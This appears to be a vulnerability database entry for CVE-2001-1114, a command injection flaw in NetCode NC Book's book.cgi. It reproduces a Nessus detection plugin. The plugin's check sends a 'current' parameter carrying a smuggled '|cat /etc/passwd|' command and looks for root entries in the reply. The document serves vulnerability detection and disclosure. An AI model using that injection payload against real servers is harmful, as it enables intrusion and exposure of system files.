Vulnerabilities > CVE-2001-1114 - Unspecified vulnerability in Netcode NC Book 0.2B

047910
CVSS 0.0 - NONE
Attack vector
UNKNOWN
Attack complexity
UNKNOWN
Privileges required
UNKNOWN
Confidentiality impact
UNKNOWN
Integrity impact
UNKNOWN
Availability impact
UNKNOWN
netcode
nessus

Summary

book.cgi in NetCode NC Book 0.2b allows remote attackers to execute arbitrary commands via shell metacharacters in the "current" parameter.

Vulnerable Configurations

Part Description Count
Application
Netcode
1

Nessus

NASL familyCGI abuses
NASL idNCBOOK_CGI.NASL
descriptionThe CGI
last seen2020-06-01
modified2020-06-02
plugin id10721
published2001-08-13
reporterThis script is Copyright (C) 2001-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/10721
titleNetCode NC Book book.cgi current Parameter Arbitrary Command Execution
code
#
# (C) Tenable Network Security, Inc.
#

include( 'compat.inc' );

if(description)
{
 script_id(10721);
 script_version ("1.26");
 script_cve_id("CVE-2001-1114");
 script_bugtraq_id(3178);

 script_name(english:"NetCode NC Book book.cgi current Parameter Arbitrary Command Execution");
 script_summary(english:"Checks for the presence of /cgi-bin/ncbook/book.cgi");

   script_set_attribute(
    attribute:'synopsis',
    value:'The remote service allows arbitrary command execution.'
  );

  script_set_attribute(
    attribute:'description',
    value:"The CGI 'book.cgi' is installed.  This CGI has a well
known security flaw that lets an attacker execute arbitrary
commands with the privileges of the http daemon."
  );

  script_set_attribute(
    attribute:'solution',
    value: "Remove the affected CGI script."
  );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:H/RL:U/RC:ND");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2001/08/13");
 script_set_attribute(attribute:"vuln_publication_date", value: "2001/08/13");
 script_cvs_date("Date: 2018/06/13 18:56:28");
   script_set_attribute(attribute:"plugin_type", value:"remote");
   script_end_attributes();

 script_category(ACT_GATHER_INFO);
 script_copyright(english:"This script is Copyright (C) 2001-2018 Tenable Network Security, Inc.");
 script_family(english:"CGI abuses");
 script_dependencie("http_version.nasl", "find_service1.nasl", "no404.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 exit(0);
}

#
# The script code starts here
#

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = get_http_port(default:80);

function check(dir)
{
  local_var r, w;

  w = http_send_recv3(method:"GET", item:string(dir, "/ncbook.cgi",
"?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10"),
		port:port);
  if (isnull(w)) exit(1, "The web server on port "+port+" did not answer");
  r = strcat(w[0], w[1], '\r\n', w[2]);
if(egrep(pattern:".*root:.*:0:[01]:.*", string:r))
  {
   security_hole(port);
   exit(0);
  }
}


check(dir:"/ncbook");
foreach dir (cgi_dirs())
{
check(dir:string(dir));
check(dir:string(dir, "/ncbook"));
}